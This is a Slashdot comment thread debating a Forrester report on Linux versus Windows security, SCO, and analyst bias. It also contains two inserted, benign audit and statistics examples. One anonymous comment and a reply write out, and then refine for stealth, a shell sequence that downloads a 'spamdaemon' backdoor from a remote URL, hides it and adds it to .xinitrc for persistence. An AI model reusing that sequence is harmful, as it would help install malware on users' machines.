      His argument for taking SCO's side boils down to "I'm pissed at some Linux fanboys!" That's fine but I hope he doesn't expect anyone to ever take him seriously as an analyst again (if they ever did). Almost by definition Analysts and Critics must have a thick skin because there's always someone who is going to insult them. Once they lose their objectivity they are effectively washed up.

      He further insults the integrity of Groklaw without actually pointing to any flaws in the facts that Groklaw presents. He ignores all the evidence mounting up against SCO and the fact that SCO has been backpedaling so fast they're tripping over themselves to get out of the way of the coming storm.

      --
      Sure information wants to be free, but how much are you willing to pay for the packaging?
    3. Re:A comment on Forrester from one of their own. by stephanruby · · Score: 2, Interesting
      Never believe anyone who refers to the use of shared public domain code as "theft".

      Here is the quote you're referring to -->

      For me the course of events looked like the community had said once a crime had been committed that "there is no evidence", then when evidence was found they changed their tune to say "what was stolen didn't belong to SCO in the first place". If they had started with the second position and behaved reasonably I might have believed them, since they didn't, I didn't.

      Not only is this guy saying that the shared public domain code is theft, but he put quote marks around it and makes it sound like a linux supporter actually said "what was stolen didn't belong to SCO in the first place". Apparently, he's paraphrasing what a linux supporter said and now he's putting quotes around it as if it was said verbatim. Am I right? I'm not a native English speaker, so if someone else has a better explanation for his use of quotes -- please let me know.

    4. Re:A comment on Forrester from one of their own. by Anonymous Coward · · Score: 0
      Am I right? I'm not a native English speaker, so if someone else has a better explanation for his use of quotes -- please let me know.

      Technically, you are correct. But the voice, tone and the specific reference to 'the community' doing the speaking make it obvious he is paraphrasing.

    5. Re:A comment on Forrester from one of their own. by kraut · · Score: 1

      Just goes to show what every sensible person already knows: The more rabid the "advocacy", the more counterproductive it is.

      --
      no taxation without representation!
    6. Re:A comment on Forrester from one of their own. by Anonymous Coward · · Score: 0

      First off, mod him up further.

      Secondly, the link to an article by Rob Enderle is as disgusting, vile and repulsive as anything by goatse.

      Numerous strawmen (hmmm, most seem to be women!) are brought up and put on fire with the same triumphant sickening self congratulatory text.

      Read it and see what kind of poo is sold as analysis. Disgusting.

    7. Re:A comment on Forrester from one of their own. by superflippy · · Score: 1

      Never believe anyone who refers to the use of shared public domain code as "theft".

      I generally follow the rule "never believe anyone whose name is Rob Enderle."

      --
      Your fantasies contain the seeds of important concepts.
    8. Re:A comment on Forrester from one of their own. by slipstick · · Score: 1

      You are partly correct.

      He is indeed making it sound as if a Linux supporter was quoted verbatim but in fact no Linux supporter ever said anything about "stolen" code (at least none that I am aware of).

      Unless I'm mistaken the series of events he is referring to involves SCO showing purportedly "stolen" code during a PowerPoint presentation. The code snippets were tracked to BSD code which had previously been placed in the public domain (or as close as you can get).

      Every piece of purported evidence that SCO has dained to release has been soundly discredited.

      In English we do not call this paraphrasing, we call it an "attempt to deliberately mislead and deride"; some might call it "mocking". Had he actually made it sound like a specific individual made the "what was stolen..." comment he could quite possibly be sued for defamation of character. Instead he refers only to "linux supporters"; a group can't sue for comments like this.

      Furthermore he even "begs the question" by stating "once a crime had been committed" when in fact no crime has been committed or at least none has yet been proven and the way the case is going none is likely to be.

      The whole article is written in a manner to deride the linux community rather than support a position as to why he believes SCO is correct. He refers to linux supporters as criminals completely without evidence, gee that's sure unbiased. I'm sure like any large group there is a criminal or two in it but as a whole we are as law abiding as the next person.

      --
      Sure information wants to be free, but how much are you willing to pay for the packaging?
    9. Re:A comment on Forrester from one of their own. by Anonymous Coward · · Score: 0

      that SCO has dained to release

      Just so you know, that word is 'deigned'.

    10. Re:A comment on Forrester from one of their own. by jejones · · Score: 1

      Never trust anyone who calls themselves the Enderle group.

      On the contrary, it's eminently appropriate. Ask any mathematician: there's a unique (up to isomorphism) group with one element, called the trivial group.

    11. Re:A comment on Forrester from one of their own. by boisepunk · · Score: 1

      allah is great
      crap post
      karma will be mine

      farewell all

      --
      main(0)
    12. Re:A comment on Forrester from one of their own. by boisepunk · · Score: 1

      karma will be mine
      allah is great; praise be to him
      crap post
      glorious jihad

      amen

      --
      main(0)
  78. Well duh. by tgd · · Score: 1

    As a result, the conclusions drawn by Forrester have extremely limited real-world value for customers

    That's probably why they went from having all but two floors of the building they were in, in Cambridge, to only two floors and part of a third.

  79. Don't forget by geekoid · · Score: 1

    Forester was intsremental in trying to stop the martian. In fact, he brought one of their 'eye pieces' in for study. In the end, it was are basteria that did them in though.
    Dr. Forester also has a plane.

    --
    The Kruger Dunning explains most post on /. http://en.wikipedia.org/wiki/Dunning%E2%80%93Kruger_effect
    1. Re:Don't forget by geekoid · · Score: 1

      Note to self, re-read post 3 times when drinking.

      --
      The Kruger Dunning explains most post on /. http://en.wikipedia.org/wiki/Dunning%E2%80%93Kruger_effect
    2. Re:Don't forget by shadowbearer · · Score: 1

      Hee, I've done that a time or two *cough* :-)

      SB

      --
      It's old. The more humans I meet, the more I like my cats. At least they are honest.
  80. My Take.. by naelurec · · Score: 2, Interesting

    I didn't read the report, as I am sure most of you haven't, simply because it is $899 to tell me something that I already know otherwise.

    Anyways, my question is about the severity of the vulnerabilities. When you get right down to it, Microsoft generally only offers one web server, one mail server, one database server, etc..etc..etc.. A standard distribution OTOH includes a huge array of software. For example, I can choose sendmail, postfix, qmail, exim and others for my mail server; apache, aolserver, boa, dhttpd, zope, etc for my web server; php, ruby, python, perl, cgi, etc for my scripting needs; mysql, postgresql, berkley db, firebird, etc for a database; gnome, kde, xfce, etc for a window manager ..

    you get the point.

    In addition to the multitude of different configurations that I could have for a particular system, I can also, if desired, cut out everything that is not essential to maintain as barebones of a system as possible (heck this even includes lots of kernel modules/features).. I can run everything through a localized firewall, block ports, limit IP ranges for various services, chroot/jail certain services, etc..etc..etc..

    So I guess my question is:

    1. Does this report simply gather up all published security issues and compare? Or do they look at "best practices" on both platforms and only compare packages that, for example, would be installed on a web server, mail server, database server, standard desktop, etc?

    2. What is the true damage that could be done by successfully exploiting these issues? Ie, I'm sure most BIND installations are in a chroot/jail .. so even if that was exploited, a cleanup on a *nix machine would be significantly faster than perhaps a Windows box that does not chroot its respective DNS service.

    Sure, raw data might indicate that a Red Hat distro has the same number of exploits as a Windows system, but I am much more interested in the applicability of those exploits to my systems and ultimately the increased chance of exploit.

  81. Re:Linux by jtev · · Score: 1

    You're right, I do want to go back to the greatest OS ever invented, but fortunately I'm about to go home, so my GNU/Linux box is only about half an hour away.

    --
    That which is done from love exists beyond good and evil
  82. oranges and prime numbers by fluxmix · · Score: 0

    why are we arguing about what kind of oranges we like? i mean linux, windows, and os x are different types of oranges (cli + gui = os) this is boring already. lettuce have salad and eat a new computer interface:

    SmellOS

    i wrote it yesterday and got it to run on a 286 tandy and an old gameboy i had laying around i just hooked them up to different essential oils now my inbox smells like spruce (get it PINE!)

  83. Re:Analyst hacks will never bit the hand that feed by fferreres · · Score: 2, Insightful

    The IT research firm I work for has been contracted by Microsoft to study the Linux vs Windows value to corporations just recently (last week).

    Microsoft, for the first time, paid in full advance even before a full proposal could be drafted, or even basic details.

    They initially wanted a TCO study, and our CEO told them to NOT DO THAT, he is very honest, and knew beforehand Windows would lose. On the other hand, we do not know what will happen.

    The reality is that under some very common scenarios, at least where I live, Linux expertise is regarded as expensive, and that some Microsoft apps allow companies to get work done quicker.

    If you were to look at the Linux trend of adoption, growing support, etc., regarded retraining costs as an investment into future savings, noted that Microsoft is free to change its pricing policy anytime, and they can force you to demand more than you want in the future, and that after 3 years you own nothing at all (license obsolete, or app obsolete), then you'll see Linux winning by a lot.

    But guess what, Research firms, even unbiased ones, tend to choose scenarios that are real world, but benefit their customers more.

    If IT adopters were the ones financing these research studies, then the story would be different. But guess what? They don't pay much, and if they do, then Microsoft and the likes can double the bet to get what they want or, as someone else put it, they'd pay you $400 so that you'll "agree" with whatever their CIO believes is true. The same happens with newspapers, what you read is 90% dictated by the ads they can sell in that "section". That's why you always see some Cars supplement, because people like it, but MORE importantly, because they can sell expensive ads.

    If you want unbiased researchers, find a way to fund them that does not involve their revenues depending on an interested party.

    --
    unfinished: (adj.)
  84. *nix is still more secureable by Xenographic · · Score: 1

    Okay, true. There are some Windows lockdown tools. Some are even pretty good. Of course, there are also things like that nasty "shatter" attack... You know, the badly designed bit of protocol that makes windows (the objects) vulnerable if they have an edit control, are on the desktop, and have admin privs.

    Now, of course, you may say that good coding practices (and how I wish that we all used good practices!) dictate not to have a vulnerable window with an edit control to be vulnerable to that.

    I've heard it compared to a SUID root program with an overflow. My question is: How do you audit your system for crap like that? Mind you, finding ALL SUID root executables is a single command on *nix.

    This is just a small example of how *nix is more secureable than windows.

    Another would be this: we all know about format string bugs. Nasty chars can be injected and will cause overflow problems in anything that uses them improperly. In *nix, a few appropriate greps will allow me to find (and fix!) every single such bug in Linux (SFAIK, there aren't any, but the point here is that I can *check*). How many are in Windows? How do you know? I don't relish the thought of reverse engineering Windows to check, moreover the EULA says that I cannot (whether or not this EULA is actually enforceable, I leave to others to debate).

    Suppose another such category of exploits is discovered; what can you do? I can grep, you cannot. And think before you speak--even a code monkey can grep for things like format strings & bug someone else to fix it.

    Linux is secureable, Windows cannot be ... unless it were set Free (libre), perhaps...

    As for who is the most secure, that's OpenBSD, hands down. Theo may not be the most likeable person ever, but he keeps OpenBSD secure. I half-wish he'd audit Linux, but I'm sure he'd probably just drive the core developers nuts...
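
The two audits the post above describes (listing setuid binaries with one find command, and grepping C sources for printf-family calls whose format argument is not a string literal), as an added example that is not part of the Slashdot thread; it assumes POSIX sh with find, grep, mktemp and chmod, and runs against a constructed sample tree rather than a real system.

```shell
#!/bin/sh
# Added example, not code from the post or from any distro.
# Assumes POSIX sh with find, grep, mktemp and chmod; the sample tree below is constructed.

# List files with the setuid bit set below a directory.  Pass an owner as the
# second argument (e.g. root) to restrict to setuid-root binaries, which is the
# "single command" audit the post mentions:  find_suid / root
find_suid() {
    if [ -n "${2:-}" ]; then
        find "$1" -xdev -type f -perm -4000 -user "$2" 2>/dev/null | sort
    else
        find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
    fi
}

# Grep C sources for calls where the format argument is not a string literal,
# e.g. printf(msg) or fprintf(stderr, msg).  These are candidates for review,
# not confirmed bugs: a non-literal format may still be a trusted constant.
find_format_string_candidates() {
    grep -rnE \
        -e '(^|[^[:alnum:]_])printf[[:space:]]*\([[:space:]]*[^"[:space:])]' \
        -e '(^|[^[:alnum:]_])(fprintf|sprintf|syslog)[[:space:]]*\([^,]*,[[:space:]]*[^"[:space:]]' \
        "$1" 2>/dev/null
}

# Count candidate lines, so a build or audit script can fail on a nonzero result.
count_format_string_candidates() {
    find_format_string_candidates "$1" | wc -l | tr -d ' '
}

# Build a constructed sample tree: one setuid file, one plain file, and one C
# source with two bad calls and three good ones.  Prints the directory path.
make_sample_tree() {
    dir=$(mktemp -d)
    mkdir "$dir/bin" "$dir/src"
    printf '#!/bin/sh\necho hi\n' > "$dir/bin/setuid_tool"
    printf '#!/bin/sh\necho hi\n' > "$dir/bin/plain_tool"
    chmod 4755 "$dir/bin/setuid_tool"
    chmod 0755 "$dir/bin/plain_tool"
    cat > "$dir/src/log.c" <<'EOF'
#include <stdio.h>
#include <syslog.h>
void log_msg(const char *msg) {
    char buf[64];
    printf(msg);                          /* bad: caller data is the format */
    printf("%s\n", msg);                  /* good: literal format */
    fprintf(stderr, msg);                 /* bad */
    snprintf(buf, sizeof buf, "%s", msg); /* good */
    syslog(LOG_INFO, "%s", buf);          /* good */
}
EOF
    echo "$dir"
}

# Stand-alone run: audit the sample tree and show what each check finds.
sample=$(make_sample_tree)
echo "setuid files:"
find_suid "$sample"
echo "format string candidates:"
find_format_string_candidates "$sample/src"
rm -rf "$sample"
```

On a real host, `find_suid / root` needs enough privilege to read every directory, and the grep should be run over the source tree of the packages you actually ship.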

  85. someting along the lines of... by zogger · · Score: 1

    ... underwriters laboratories or like consumer reports magazine? Are there any other remotely credible industry neutral testers or analysts out there?

    1. Re:someting along the lines of... by fferreres · · Score: 1

      I think there are, just not on all subjects. Also, the "waters" are divided whan two competing important customers demand the same study. For example, AMD and Intel are customers, so there is no unintentional biasing there, and there is no biasing in estimating markets in general. When studing demand (what they need), there also no biasing. Also, any biasedness in the case of the MS study will be complemented by IBM being an important customer. So I will try to keep the Linux vs. Microsoft study neutral, but the point is...99% of the analists here haven't even SEEN a Linux screen, and they somhow react in the same way when they ignore something, they are at a huge disavantage if anything they don' t have a clue about succeeds. Same with admins.

      It's very difficult to be 100% unbiased...but you tend to speak better of what you know better. And also, nobody will complain if you say Windows is just a bit more valuable for X kind of company, and many WILL if you say otherwise.

      TCO and ROI analisys will always be biased, even companies like HP and IBM do this kind of analisys for their clients (or a third party does those for them) and guess what? They always have a better ROI for their outsourcing solutions for example.

      In brief, it's easy to lie with statistics, but some facts do not change. Linux is growing, people are finding it useful, no matter what we say. Even myself, a Linux enthusiast, don't feel like "pushing" for Linux any harder than they can accept...

      --
      unfinished: (adj.)
  86. What no one's said... by Anonymous Coward · · Score: 0

    Is that the basic Linux system architecture is more secure.

    Once viruses and such have been downloaded by a stupid user, Windows makes it easy to run them; the default account is effectively root. On Linux, or any kind of Unix, the damage a virus can do is largely confined to the user's home directory. To do system-wide damage, a program would have to be run as root; if you login as root to read your email, you deserve to get screwed.

    Even that assumes that the user actually runs the virus. A non-technical person doesn't know how to use chmod and set execute permissions. In Linux, there is no .exe.

    I don't think there's even a chroot() in Windows. I could be wrong; my knowledge of the Windows API is pretty bad. But assuming I'm right, that makes it much more likely that malware and corrupted services can get access to the whole filesystem tree.

    In short, Windows is "surface-heavy." Once you get past that nice, user-friendly GUI, there's not much worth looking at.

  87. "masters of sqibbling excuses" by Rolf+Tollerud · · Score: 0, Flamebait

    Some day the Linux losers will wake up and realize how pathetic this again and again "report bought by Microsoft" sounds to others.

    1. Re:"masters of sqibbling excuses" by ozmo · · Score: 1

      micro$, everything to everyone......

    2. Re:"masters of sqibbling excuses" by Thundersnatch · · Score: 1

      "A fanatic is one who can't change his mind and won't change the subject."

      -Winston Churchill

  88. Re:Analyst hacks will never bite the hand that feed by igloo-x · · Score: 0

    Fucking beautiful. Absolutely beautiful.

  89. Re:Analyst hacks will never bite the hand that feed by slipstick · · Score: 3, Interesting

    While I agree with your fanboy critique, your criticism that any attempt to denounce a study in favor of Microsoft is always a knee-jerk reaction simply isn't relevant in this particular instance.

    I don't know if you took the time to read the response from the Linux vendors to the Forrester report, but it is clear that if Forrester conducted the analysis as described, they made a HUGE statistical error. The question naturally must be asked: "how could a supposedly well-funded source miss such an obvious gaffe?" It takes time and money to do research; surely Forrester has one above-average statistician on staff.

    To have performed such a study and in the end wasted their money would seem incredulous. This is akin to being asked to write a word processor and coming up with a spreadsheet program. A natural supposition then is to question the motives of the researchers; however, this could easily be a case of "never put down to malice what can easily be attributed to incompetence."

    --
    Sure information wants to be free, but how much are you willing to pay for the packaging?
  90. Shell Script by Anonymous Coward · · Score: 0
    Can you actually write a shell script that takes control of the system?
    Easy,
    wget http://myfunkyurl.ru/spamdaemon
    mkdir ...
    cp spamdaemon ...
    cd ...
    chmod +x spamdaemon
    echo "~/.../spamdaemon" > ~/.xinitrc
    ./spamdaemon

    The spamdaemon sets up a remote backdoor, starts harvesting mail addresses in ~/Mail, and does all the usual stuff Windows worms do.
    With SELinux, this might become a lot more difficult though. e.g. it could prevent you from running programs that haven't been installed using signed packages.
    1. Re:Shell Script by meringuoid · · Score: 1

      wget http://myfunkyurl.ru/spamdaemon
      mkdir ...
      cp spamdaemon ...
      cd ...

      Wouldn't this leave a suspicious-looking file called spamdaemon in (probably) the user's home directory? Why not create ... first, cd into it and _then_ wget your nasty program?

      chmod +x spamdaemon
      echo "~/.../spamdaemon" > ~/.xinitrc

      This should probably be a >>, not a >. You'll overwrite the existing .xinitrc, mess up a whole bunch of startup scripts and the user will take the computer to a geek to be fixed.

      Also, what if the script was originally run in a directory other than ~? Wouldn't spamdaemon then be in ~/somewhere/somewhereelse/.../spamdaemon?

      I'd do:

      cd
      mkdir ...
      cd ...
      wget http://www.myfunkyurl.ru/spamdaemon
      chmod +x spamdaemon
      echo "~/.../spamdaemon" >> ~/.xinitrc
      ./spamdaemon

      --
      Real Daleks don't climb stairs - they level the building.
  91. Re:Linux by iamacat · · Score: 1

    make things look like something that a professional would use

    Like a web browser with a spell checker perhaps?

  92. You're probably right Mrs. Koetzle, aren't you? by triptolemeus · · Score: 1

    "The bottom line? Any of these platforms can be operated securely," said Koetzle. (Koetzle is the leader of the Forrester Team).

    Now have a look at yesterday's Slashdot Virus article.

    --
    The site where: "I'm right, as long as you ignore the things that prove me wrong", became a valid method of debate.
  93. A bug is a bug by iamacat · · Score: 1

    A slight bug in a locally installed setuid program usually gives access to that account. A slight bug in a remotely callable program usually creates a remote exploit with enough determination, or at least a nice, satisfying denial of service. For example, if your server logs long audit messages for each failed login, I can just keep calling until your machine runs out of disk space.

    Therefore, I think it's justified to count all security bugs of measurable consequence and not try to assign an exact priority. What makes sense is setting up stripped-down Linux servers that only run the top-tested software. If you run a web server with perl, python, tk and shell scripts as apache modules, you might well have more bugs than a fully patched IIS with no extra stuff installed. On the other hand, if you stick to tomcat and well-written J2EE apps that always use prepared statements for user input and set up a firewall to reject all incoming traffic except ports 22, 80 and 443, you probably have more worries about physical access and kidnapping than remote exploits.

  94. More statistics by markcox · · Score: 1

    So one of the points we make in the joint statement is that the Forrester report treats all vulnerabilities as equal. After all the time and effort we all put into the raw data set, seeing it boiled down to a simple mean average is disappointing.

    Anyone who follows the security advisories for any Linux distribution knows that the critical fixes are fixed first and fixed quickly. Let's take the Microsoft definition of a "critical vulnerability" for example. Then for Red Hat Enterprise Linux in the 21 months from release to March 2004 there were 13 CVE named issues that matched the definition. 77% of those were fixed within a day of them being public. The mean was 1.1 days.

    Even if we take into account attacks Microsoft would not class as critical, things like privilege escalation, remote DoS, information leaks, etc., then we get to 47 CVE named issues where 57% were fixed within a day of them being public. The mean was 7 days.

    You'll see the same effect for all the Linux distributors mentioned in the report. However, not even all "critical" vulnerabilities have the same risk to all users - you might not be using fetchmail, or your box might not have an SSL-enabled webserver. So really, to get an accurate assessment of "days of risk", you need to look at which of the vulnerabilities affected you, which posed the most risk to your organisation, then see how quickly your vendor fixed them.

    -- Mark

    --
    -- Mark Cox, http://www.awe.com/mark/
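    To make the "simple mean average" point above concrete, here is an added example (not part of the joint statement or of Mark's post) that computes days of risk over a constructed set of advisory records with placeholder CVE ids: first over everything, then for critical issues only, then restricted to the packages a particular site actually runs.

```python
from dataclasses import dataclass
from datetime import date
from statistics import mean


@dataclass(frozen=True)
class Advisory:
    """One vendor advisory: when the issue went public and when a fix shipped."""
    cve: str          # placeholder id, not a real CVE number
    package: str
    severity: str     # "critical", "important", "moderate" or "low"
    public: date
    fixed: date

    @property
    def days_of_risk(self) -> int:
        return (self.fixed - self.public).days


# Constructed sample data, not any vendor's real advisory history.
SAMPLE = [
    Advisory("CVE-XXXX-0001", "openssl", "critical", date(2003, 9, 30), date(2003, 9, 30)),
    Advisory("CVE-XXXX-0002", "sendmail", "critical", date(2003, 9, 17), date(2003, 9, 18)),
    Advisory("CVE-XXXX-0003", "kernel", "critical", date(2003, 12, 1), date(2003, 12, 1)),
    Advisory("CVE-XXXX-0004", "fetchmail", "critical", date(2003, 10, 15), date(2003, 10, 18)),
    Advisory("CVE-XXXX-0005", "gdk-pixbuf", "moderate", date(2003, 11, 3), date(2003, 12, 5)),
    Advisory("CVE-XXXX-0006", "xpdf", "low", date(2004, 1, 12), date(2004, 2, 20)),
]


def days_of_risk_summary(advisories, severities=None, installed=None):
    """Count, share fixed within one day, and mean days of risk for the
    advisories matching the given severity tiers and installed packages.
    Returns None when nothing matches, rather than a misleading zero."""
    selected = [a for a in advisories
                if (severities is None or a.severity in severities)
                and (installed is None or a.package in installed)]
    if not selected:
        return None
    days = [a.days_of_risk for a in selected]
    within_a_day = sum(1 for d in days if d <= 1) / len(days)
    return {"count": len(days), "within_a_day": within_a_day, "mean_days": mean(days)}


if __name__ == "__main__":
    # The flat mean is dominated by two low-severity, slowly fixed issues.
    print("all issues:   ", days_of_risk_summary(SAMPLE))
    print("critical only:", days_of_risk_summary(SAMPLE, severities={"critical"}))
    print("what I run:   ", days_of_risk_summary(SAMPLE, severities={"critical"},
                                                 installed={"openssl", "kernel"}))
```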
  95. My Real World Experience Disagrees With Forrester by Long-EZ · · Score: 4, Insightful
    Every day, I receive 20-30 Netsky worms, courtesy of Windows machines.

    Much of my daily spam now comes from compromised Windows boxes being run as spam zombies.

    My personal data was stolen from a company I trusted because their server was running IIS and it was infected with Slammer.

    I suffer because of Windows insecurity almost constantly, yet no operating system *except* Windows has ever caused me any such grief. Clearly the Forrester "data" is FUD. Plain and simple.

    --
    >> My ultraviolent Linux switch video.
  96. Fine grained privileges or security by Per+Abrahamsen · · Score: 1

    You can have one of the two, but not both.

    Back before I became a law-abiding citizen, my experience was that the more fine-grained the privilege system is, the easier it is to crack. The key is that you first get some small, insignificant privileges, and then use these to gain some slightly larger privileges, and so on. On Unix systems, the key to breaking in tended to be sgid, not suid.

    If administrators and users are both competent and careful, breaking in is hard. But it is easier to be incompetent with a complex system, and it is more common to be lazy if less is apparently at stake. "Ok, if someone works around this, they will get access to the shared printer. Not worth worrying about".

  97. Junction points for containment by Anonymous Coward · · Score: 0
    Windows supports junction points, which can be used (but I've never seen used) to contain a particular application to a particular volume
    Details?
  98. Re:I received it in my mail and I couldn't believe by anno1a · · Score: 1

    I wouldn't really want Debian to join forces with the larger software houses. Debian is truly free, and I love that it stays that way. Furthermore, I like the Debian way of doing things, while I resent the Red Hat way - that's why I use Debian, and wouldn't want a merge to change this.

    --
    ------- I fumbled my registration and I now must suffer
  99. mod parent up, not flamebait at all by lucas+teh+geek · · Score: 0

    mod parent up, not flamebait at all

    --
    TIAEAE!
  100. Why not mention the amount of software itself by rob_kg · · Score: 1

    What is this test based on? On all vulnerabilities of packages that these distributions maintain against the Windows operating system? How do they go about evaluating which software should be part of this? How about Desktop vs. Server use? Man, everyone runs such a wide range of different application sets! Maybe a good comparison would be to have a Linux system with:
    - Kernel
    - Most common GNU software
    - Apache
    - PHP
    - KDE or GNOME
    - Mozilla
    - OpenOffice.org
    against all Microsoft security bulletins and their severity. But then the percentages of uses must also be estimated, like how many Windows users have IIS enabled and how many Linux users use OpenOffice on how many machines they have. Also, not unimportant: how much time did the bug trackers give vendors to create the patch? For example, the do_brk exploit for Linux was private for some time before it leaked, so it was impossible for vendors to make the patch before the news was public knowledge. There's just too much to think about to come to an accurate conclusion.. even impossible, cause how do you track the use of certain software in the Open Source community, and of course the Windows user base. Never believe such reports..

  101. Poor response letter by gr8_phk · · Score: 1

    Linux supporters should be ashamed of this response letter. It makes points about how the study misinterpreted the data, but offers no alternative analysis or conclusions. It's basically saying "they're wrong because they didn't do X" without showing how the results differ if you do X. Go ahead and tell someone they are wrong, but please show it. They haven't shown the methodology to be wrong until they show that changing it produces different results. I expect the results to change, but I don't know by how much without data - perhaps they're raving about nothing.

  102. Re:no way? Yes way! by Daytona955i · · Score: 1

    Damn straight I will. Why? Because one group represents the best interests of a bunch of fat asses who got rich off the rest of us, and the other not only represents the best interests of my community, it IS COMPOSED OF MY COMMUNITY.

    Just because they are part of your community, doesn't necessarily mean they have your best interest in mind. Most of them (with the exception of Debian) are still a company trying to sell a product. I'm not saying they don't have our interests in mind, I'm just saying your logic is flawed.

    The biggest problem with "reports" like these is that Microsoft has huge pockets that often help to "fund" them. Fortunately the linux organizations aren't that unethical. (or at least they haven't done anything to date that we know about)

    The biggest problem is "activists" like you who ruin it for the rest of the linux advocates. Or you could just be a troll and I just wasted my time.

  103. Re:Linux by jtev · · Score: 1

    Yeah, that'd be cool, too bad I was using IE from work to make that post.

    --
    That which is done from love exists beyond good and evil
  104. Re:If you think that mass-circulated study is bad. by Anonymous Coward · · Score: 0

    That's because doing wrong gets you fired and there are LOTS of out-of-work IT guys waiting for that job, no matter the pay.

  105. Snake Oil by sglines · · Score: 1

    Does anyone remember when Ken Olsen called Unix snake oil? About 6 months later that Ken Olsen was history and 10 years later so was DEC.

    Just cause Forrester says something doesn't make it so.

  106. Re:Analyst hacks will never bite the hand that feed by Rich0 · · Score: 1

    Surprisingly, Microsoft did the best job at patching vulnerabilities fast, even though it ranked at the top with the largest percentage of its security holes rated as high

    So they DID acknowledge that Microsoft's platform had the most HIGH RISK vulnerabilities, although this fact is glossed over in the article. Koetzle also acknowledges that the study did NOT look at how WELL the patches addressed the problem (MS often needs to issue more than one patch to get it right, and sometimes they fix one bug and introduce another).

    Also - note that MS frequently doesn't announce a vulnerability as soon as they find out about it. They might sit on it for a few weeks and then release the patch at the same time. Hardly an accurate assessment of how fast they fix vulnerabilities. I'm not sure what methodology was used, but they should only measure response times to vulnerabilities that are published publicly at the same time that the vendor finds out about them. I'm not convinced they'd fare better than linux in this case...